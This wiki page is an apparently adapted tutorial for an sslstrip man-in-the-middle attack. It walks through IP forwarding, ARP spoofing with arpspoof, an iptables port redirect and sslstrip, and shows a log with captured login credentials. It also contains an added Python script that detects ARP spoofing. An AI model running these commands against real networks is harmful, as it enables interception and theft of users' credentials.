Difference between revisions of "MITM: sslstrip"

From OnnoWiki

Latest revision as of 09:23, 3 October 2018

Source: https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/


The steps for carrying out an attack using sslstrip are as follows.

Check the routing,

route -n
netstat -nr

Enable IP forwarding

enable packet forwarding,

echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl -w net.ipv4.ip_forward=1

ARP spoofing

run arpspoof,

arpspoof -i eth0 -t victimip routerip
arpspoof -i eth0 -t 192.168.0.106 192.168.0.100
192.168.0.106 = victim IP
192.168.0.100 = IP of the router / gateway / server to be monitored

Check whether it worked by running arp -n on 192.168.0.106. Before arpspoof is started:

arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.13             ether   ec:a8:6b:f8:2e:fc   C                     enp3s0
192.168.0.223            ether   d0:04:92:19:cc:38   C                     enp3s0
192.168.0.7              ether   4c:e6:76:1f:15:4c   C                     enp3s0
192.168.0.100            ether   66:31:65:39:62:38   C                     enp3s0

After arpspoof is running, run arp -n again

arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.13             ether   ec:a8:6b:f8:2e:fc   C                     enp3s0
192.168.0.146            ether   08:00:27:45:7a:dc   C                     enp3s0
192.168.0.223            ether   d0:04:92:19:cc:38   C                     enp3s0
192.168.0.7              ether   4c:e6:76:1f:15:4c   C                     enp3s0
192.168.0.100            ether   08:00:27:45:7a:dc   C                     enp3s0

Note that the MAC address of 192.168.0.100 has changed :) .. It is now 08:00:27:45:7a:dc, the same MAC that is listed for 192.168.0.146.
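The before/after comparison above is also the check a defender can automate. The following is an added example, not part of the original wiki page: it parses the two arp -n outputs shown above and reports every IP whose MAC changed, together with any other IP that now claims the same MAC. The function names are illustrative.

```python
import re

# The two `arp -n` outputs shown on this page (before and after arpspoof).
BEFORE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.13             ether   ec:a8:6b:f8:2e:fc   C                     enp3s0
192.168.0.223            ether   d0:04:92:19:cc:38   C                     enp3s0
192.168.0.7              ether   4c:e6:76:1f:15:4c   C                     enp3s0
192.168.0.100            ether   66:31:65:39:62:38   C                     enp3s0
"""
AFTER = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.13             ether   ec:a8:6b:f8:2e:fc   C                     enp3s0
192.168.0.146            ether   08:00:27:45:7a:dc   C                     enp3s0
192.168.0.223            ether   d0:04:92:19:cc:38   C                     enp3s0
192.168.0.7              ether   4c:e6:76:1f:15:4c   C                     enp3s0
192.168.0.100            ether   08:00:27:45:7a:dc   C                     enp3s0
"""

# Matches resolved entries only; the header and "(incomplete)" rows are skipped.
ROW = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+ether\s+([0-9a-fA-F:]{17})\s", re.M)

def parse_arp(text):
    """Return {ip: mac} for every resolved ether entry in `arp -n` output."""
    return {ip: mac.lower() for ip, mac in ROW.findall(text)}

def shared_macs(table):
    """Return {mac: [ips]} for MACs claimed by more than one IP."""
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def arp_alerts(before_text, after_text):
    """Report IPs whose MAC changed between two snapshots."""
    before, after = parse_arp(before_text), parse_arp(after_text)
    dup = shared_macs(after)
    alerts = []
    for ip in sorted(before.keys() & after.keys()):
        if before[ip] != after[ip]:
            others = [o for o in dup.get(after[ip], []) if o != ip]
            alerts.append({"ip": ip, "old_mac": before[ip],
                           "new_mac": after[ip], "also_claimed_by": others})
    return alerts

if __name__ == "__main__":
    for a in arp_alerts(BEFORE, AFTER):
        print(f"{a['ip']}: {a['old_mac']} -> {a['new_mac']} (also claimed by {a['also_claimed_by']})")
```

A MAC shared by two IPs is not always malicious, since one host can hold several addresses, so a changed MAC on the gateway entry is the stronger signal.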

Redirect packets

redirect inbound traffic for port 80 (http) to port 8080 (sslstrip).

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


Redirecting HTTPS (port 443) still seems to be problematic, for both sslstrip and mitmproxy.

sslstrip

Run sslstrip so that it listens on port 8080

cd ~
sslstrip -l 8080             # for Kali Linux
python sslstrip.py -l 8080   # for BackTrack

View the log

the intercepted data can be seen in sslstrip.log, for example,

cd ~
tail sslstrip.log
more sslstrip.log 
2017-04-04 17:07:16,065 POST Data (192.168.0.100):
login_username=onno&secretkey=123456&js_autodetect_results=1&just_logged_in=1


Crashing

For some reason sslstrip likes to crash :( ...

As a workaround, try redirecting its error output to /dev/null

sslstrip -k -f -l 10000 2> /dev/null

